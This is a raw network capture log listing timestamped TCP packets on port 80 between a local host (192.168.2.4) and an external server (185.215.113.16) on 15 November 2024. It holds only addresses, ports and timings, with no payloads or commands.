Nov 15, 2024 14:09:35.749196053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749207973 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749217033 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749224901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749244928 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749265909 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749411106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749428034 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749440908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749455929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749469042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749475002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749507904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749524117 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749604940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749617100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749627113 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749645948 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749666929 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749783039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749793053 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749800920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749809980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749819994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749830961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749833107 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749841928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.749866009 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.749881029 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750066042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750076056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750085115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750094891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750104904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750116110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750119925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750124931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750148058 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750164986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750377893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750386953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750396967 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750407934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750416994 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750421047 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750430107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750436068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750441074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750451088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750474930 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750500917 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750642061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750652075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750662088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750703096 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750829935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750839949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750849962 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750859022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750869989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750876904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750880003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750890970 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750899076 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750902891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750912905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750916004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750929117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750931025 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.750941992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.750961065 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751014948 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751271963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751287937 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751297951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751307964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751321077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751332998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751336098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751348019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751357079 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751358986 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751388073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751410961 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751646042 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751657963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751667023 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751677990 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751688004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751696110 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751698971 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751709938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751718998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751723051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.751746893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.751761913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752077103 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752089024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752099037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752110004 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752120972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752127886 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752130985 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752142906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752152920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752156019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752163887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752167940 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752176046 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752186060 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752201080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752228022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752513885 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752525091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752533913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752543926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752554893 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752562046 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752566099 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752577066 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752578020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752589941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752599955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752599955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752610922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752616882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752624035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.752651930 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.752671957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753336906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753348112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753356934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753520012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753571987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753582954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753593922 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753622055 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753638983 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753659010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753669977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753693104 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753703117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753705978 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753714085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753725052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753735065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.753739119 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753758907 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.753772974 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.754019022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.754029989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.754070997 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.754095078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.754106045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.754134893 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.755538940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.755587101 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.801522017 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.801536083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.801547050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.801595926 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827102900 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827116013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827167988 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827193022 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827230930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827243090 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827271938 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827328920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827416897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827425003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827431917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827439070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827451944 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827580929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827591896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827610970 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827627897 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827651024 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827759981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827773094 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827857971 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.827929974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.827974081 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.828269005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828321934 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.828470945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828483105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828493118 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828506947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828516960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.828527927 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.828557014 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.867925882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.867938995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.867949963 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.867963076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868061066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868072987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868083954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868113041 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868149996 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868330002 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868346930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868359089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868391037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868407965 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868485928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868501902 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868514061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868525982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868529081 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868539095 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868549109 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868562937 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868593931 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868769884 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868787050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868818045 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868834019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868870974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868884087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868900061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868915081 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.868923903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868968010 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.868983984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869004011 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869014978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869026899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869038105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869039059 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869056940 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869085073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869410038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869426966 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869437933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869452953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869463921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869473934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869479895 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869510889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869537115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869554043 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869565010 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869595051 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869612932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869682074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869721889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869833946 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869847059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869858027 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869877100 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869883060 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869888067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869904995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869910955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869919062 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869924068 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869931936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869944096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869955063 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869955063 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869966984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869977951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.869986057 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.869999886 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870022058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870027065 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870038986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870050907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870085955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870085955 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870574951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870590925 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870603085 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870614052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870620012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870625973 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870635033 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870665073 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870776892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870796919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870809078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870825052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870829105 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870837927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.870853901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.870878935 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871011019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871022940 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871041059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871053934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871064901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871079922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871105909 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871123075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871136904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871148109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871159077 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871160984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871171951 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871172905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871187925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871203899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871220112 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871512890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871534109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871545076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871561050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871573925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871573925 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871577024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871591091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871609926 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871633053 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871661901 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871700048 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871803999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871818066 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871829987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871840954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871845007 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871854067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871866941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871866941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871886969 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871895075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.871895075 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.871906042 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872095108 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872250080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872268915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872279882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872297049 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872303963 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872318983 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872386932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.872421980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.872442007 CET	80	49761	185.215.113.16	192.168.2.4
